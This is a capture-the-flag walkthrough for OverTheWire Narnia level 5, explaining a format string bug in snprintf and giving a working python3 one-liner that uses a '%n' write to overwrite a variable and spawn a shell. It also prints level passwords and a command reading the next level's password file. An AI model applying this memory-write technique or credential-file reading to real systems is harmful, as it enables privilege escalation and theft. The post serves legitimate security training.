OverTheWire Narnia Level 5 → 6 tutorial!!

Login

Use the password from Level 4 → 5 (in my run it was faimahchiy):

ssh narnia5@narnia.labs.overthewire.org -p 2226
# password: faimahchiy

Task

Binary: /narnia/narnia5

The program uses snprintf with user input but doesn’t provide a format string — opening up a format string vulnerability.

Goal: overwrite variable i from 1 to 500. The program even leaks the address of i.

Source Code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv){
    int i = 1;
    char buffer[64];

    snprintf(buffer, sizeof buffer, argv[1]);
    buffer[sizeof(buffer) - 1] = 0;
    printf("Change i's value from 1 -> 500. ");

    if(i==500){
        printf("GOOD\n");
        setreuid(geteuid(), geteuid());
        system("/bin/sh");
    }

    printf("No way...let me give you a hint!\n");
    printf("buffer : [%s] (%d)\n", buffer, strlen(buffer));
    printf("i = %d (%p)\n", i, &i);
    return 0;
}

Key Observations

• snprintf directly takes argv[1] as the format string.
• With %n, we can write the number of printed characters into an arbitrary memory location.
• Address of i is conveniently leaked.

Exploitation Steps

1. Confirm vulnerability

./narnia5 %x.%x.%x
# Change i's value from 1 -> 500...
# buffer : [f7fc5000.30303035.333032e] (26)
# i = 1 (0xffffd6d0)

✅ Classic format string issue confirmed.

2. Locate our write

We want to write 500 into i (0xffffd6d0 in my run). Trick: prepend the address, then use %n.

./narnia5 $(python3 -c 'print("\xd0\xd6\xff\xff" + "%1$n")')
# segfaults (writes 4 only, because "AAAA" length = 4)

So we need padding.

3. Use width specifier to reach 500

Instead of printing just a few chars, we pad output until its length = 500.

./narnia5 $(python3 -c 'print("\xd0\xd6\xff\xff" + "%496x%1$n")')

4. Profit

Change i's value from 1 -> 500. GOOD
whoami
# narnia6
cat /etc/narnia_pass/narnia6
# <next password>

Password

From my run:

neezoceaeng

Quick One-liner

./narnia5 $(python3 -c 'print("\xd0\xd6\xff\xff" + "%496x%1$n")')

Troubleshooting

• Wrong address? The leaked i may differ each run. Always use the address shown by the program (i = 1 (0x…)).
• Segmentation fault immediately? Ensure little-endian byte order when injecting address.
• Not writing 500? Adjust the padding: %<value-4>x%1$n.

Congrats 🎉 You just exploited a format string vulnerability to overwrite memory. Onward to Level 6 → 7!

Thanks for reading!

Until next time — Otsumachi!! 💖☄️✨